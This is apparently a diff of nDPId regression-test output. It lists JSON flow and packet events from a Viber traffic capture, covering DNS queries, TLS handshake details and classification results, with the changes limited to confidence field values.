+00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1527155641813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155641813,"pkt":"AA6OMNv9MAdNo1+nCABFAABAH5VAAEARmafAqAARwKgAD539ADUALISKl70BAAABAAAAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQAB"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1527155641840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1527155641840,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXElAAEARXIjAqAAPwKgAEQA1nf0Al5UFl72BgAABAAUAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQABwAwABQABAAAGHQAfDmQxZmplOWdtM2QwNXQ4CmNsb3VkZnJvbnQDbmV0AMAwAAEAAQAAADsABDbmXTXAMAABAAEAAAA7AAQ25l1swDAAAQABAAAAOwAENuZdn8AwAAEAAQAAADsABDbmXWM="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1527155641840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.53"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1527155641840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.53"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641845,"flow_last_seen":1527155641845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641845,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1527155641845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641845,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8nXxAAEAGSGvAqAARNuZdNdKuAbvV1v7mAAAAAKAC\/\/\/mSAAAAgQFtAQCCAoAIWOaAAAAAAEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1527155641865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641865,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMec25l01wKgAEQG70q53C5Ep1db+56AScSB9zAAAAgQFtAQCCAp+anCqACFjmgEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1527155641867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641867,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0nX1AAEAGSHLAqAARNuZdNdKuAbvV1v7ndwuRKoAQAq0bCAAAAQEICgAhY59+anCq"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155644240,"flow_last_seen":1527155644240,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1527155644240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1527155644240,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1527155644240,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0lAAEARXnTAqAARrNkXaqQJAbsAHwH3DO5PoOHayJNED10MJ0pTvsIOJQ7muOI="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1527155644243,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1527155644243,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0pAAEARXnPAqAARrNkXaqQJAbsAH4RqDO5PoOHayJNEEDIopLF1oa8UykhAnf8="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1527155644244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1527155644244,"pkt":"MAdNo1+nAA6OMNv9CABFAAAyAABAADoRu76s2RdqwKgAEQG7pAkAHohoAA5y\/VBeClgsOyCTlKKUc09Z1nXjEg=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1527155646819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1527155646819,"pkt":"AA6OMNv9MAdNo1+nCABFAABBI8dAAEARlXTAqAARwKgAD4oDADUALaw8\/YcBAAABAAAAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1527155646840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1527155646840,"pkt":"MAdNo1+nAA6OMNv9CABFAABRXJhAAEARXJPAqAAPwKgAEQA1igMAPcYV\/YeBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAASsABKzZF04="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155646840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.78"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155646840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.78"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646850,"flow_last_seen":1527155646850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155646850,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1527155646850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646850,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8QKlAAEAGdTLAqAARrNkXTqq2Abu2kyjUAAAAAKAC\/\/\/OpwAAAgQFtAQCCAoAIWh9AAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1527155646851,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646851,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8SUEAADoGspqs2RdOwKgAEQG7qrbgrF\/UtpMo1aASpagYYgAAAgQFZAQCCAqjjizLACFofQEDAwg="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1527155646855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155646855,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0QKpAAEAGdTnAqAARrNkXTqq2Abu2kyjV4Kxf1YAQAq3p2QAAAQEICgAhaH6jjizL"} -00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 